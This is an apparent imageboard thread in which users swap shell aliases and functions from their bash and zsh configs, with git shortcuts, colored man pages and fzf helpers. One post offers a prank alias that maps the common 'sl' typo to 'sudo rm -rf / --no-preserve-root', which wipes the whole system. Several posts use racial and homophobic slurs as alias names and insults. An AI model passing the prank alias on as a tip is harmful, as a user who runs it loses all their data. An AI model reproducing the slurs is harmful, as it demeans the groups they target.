Alias nigger="chromium ;

alias nigger="chromium

Attached: 1514352804487.jpg (425x425, 129K)

Other urls found in this thread:

ptpb.pw'
twitter.com/SFWRedditGifs

alias nigger="chromium

alias nigger="chromium

alias vi=nvim
alias vim=nvim
alias nano=nvim
alias nvim=emacs

Do many anons unironically use this shit?

Attached: 1467083971994.png (399x399, 67K)

alias op="faggot"

based and visual code pilled

xD racism

LOL SWEAR WORDS TOP KEK

alias sl="echo dumbass && sudo rm -rf / --no-preserve-root"

force yourself to improve typing accuracy fast

based

fuck you

It works just once.

# aliases
alias sudo="sudo "
alias ptpb='curl -F c=@- ptpb.pw'
alias ri="rm -i"
alias mi="mv -i"
alias ci="cp -i"
alias ls="ls --color=always"
alias grep="grep --color=always"
alias less="less -R"
alias vimr="vim -R"
alias sprunge="curl -F 'sprunge=

nigger

>alias vi
>what is eselect vi
>what is update-alternatives
Imagine being THIS ignorant towards modern Loonix features

alias nigger="OP"
alias faggot="OP"

fuck off gentooneet

you could just not put in your password

>update-alternatives
>Gentoo
Imagine being THIS ignorant towards modern Loonix features. I run Fedora btw.

alias ..="cd .."

Discord tranny

>alias ls="ls --color=always"

why?

alias lss='ls -la | grep $1'

# Aliases
alias zshconfig="code ~/.zshrc"
alias zshreload="source ~/.zshrc"
alias gs="git status"
alias gpl="git pull"
alias stash="git stash"
alias stash pop="git stash pop"
alias gps="git push"
alias gck="git checkout"
alias gcm="git commit -m"
alias log1="git log --graph --decorate --pretty=oneline --abbrev-commit"
alias web="cd Documents/web"
alias pacman="sudo pacman"
alias mariadb="systemctl start mariadb.service"
alias mariadbstop="systemctl stop mariadb.service"
alias ec2go="ssh -i "~/Downloads/aws-ec2-key.pem" compute-1.amazonaws.com"
alias dropgo="ssh [email protected]"

functions are basically the same
mcd () {
mkdir -p $1
cd $1
}

kp () {
kill -9 $(ps -ef | fzf | awk -F" " '{print $2}')
}

Why not?

ok
#color man pages
man() {
env \
LESS_TERMCAP_mb=$(printf "\e[1;31m") \
LESS_TERMCAP_md=$(printf "\e[1;31m") \
LESS_TERMCAP_me=$(printf "\e[0m") \
LESS_TERMCAP_se=$(printf "\e[0m") \
LESS_TERMCAP_so=$(printf "\e[1;44;33m") \
LESS_TERMCAP_ue=$(printf "\e[0m") \
LESS_TERMCAP_us=$(printf "\e[1;32m") \
man "$@"
}

i mean what does it do? i ran it with and without the arguments and nothing changed
is ls not colored by default?
do i unknowingly have rice that changed the default behavior

Depends, on my arch linux setup it didn't. Check your /etc/bash.bashrc and whatevers.

# qol aliases
alias rn="source ranger"
alias ranger="source ranger"
alias term='urxvt -cd "`xcwd`" &'
alias run='~/.util/run.sh'
alias debugtest='~/.util/debugtest.sh'
alias debug='~/.util/debug.sh'
alias cpimg='~/.util/image-to-clipboard.py'
alias xclip='xclip -selection clipboard'
[ -f ~/.fzf.bash ] && source ~/.fzf.bash
alias givemetoky='~/.util/curls/iam/getTokStagin.sh'
alias pret='python -m json.tool'

Attached: invokerpepe.jpg (2048x2048, 327K)

its not colored try running /bin/ls directly

Actually imagine the type of person who has set up these aliases...

what the fuck. /bin/ls isnt colored. odd

thanks anons

alias e="emacs -nw"
alias v="vi"
alias open="nautilus . &"
alias sl="ls"
alias web="brave-browser --app='duckduckgo.com/lite'"

Thanks, just learned that man pages apparently support color.
Didn't even know about fzf.

Not bad actually

Will be stealing this

>sl="ls"
Chaotic good
Chaotic evil

remainder that this is in the default ubuntu .bashrc
# sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'

dir = ls

cm () { mkdir -p -- "$1" && cd -P -- "$1"}
lines () { wc -l "$1" | sed 's/ .*//' }
alias exift='exiftool -overwrite_original -all='
alias pipinst='python3 -m pip install --user --upgrade'
alias fuck='sudo $(history -p \!\!)'
alias l='ls -oAhqp --color --group-directories-first --time-style="+%d-%m-%y-%H$
alias music='ncmpcpp'
alias cd='cd -P'
alias desu='sudo '
alias uptime='uptime -p'
alias inspect='tail --follow'
alias timeit='/usr/bin/time'
alias record='sox -t alsa default ~/test.wav'
alias uninst='sudo apt remove --purge --auto-remove'

Delete this

There's a bash opt that auto-cds if you type a dirname.

I use this all the time for background processes like rsyncing my music collection.

Attached: a1fea568-0079-40a2-8841-0c0a76f66c48..jpg (1075x770, 349K)

alias *='echo "null" > /dev/null'

what does that sudo one do?

Allows you to use aliases when using sudo.

Try the following:

alias foobar='echo "bar"'
sudo foobar
alias sudo='sudo '
sudo foobar

alias goddess="chromium

>using chromium instead of icecat

Cd.. Cd code... cd...

nice, very useful

>not !@

>/u/
based

Attached: 9c8.jpg (499x499, 130K)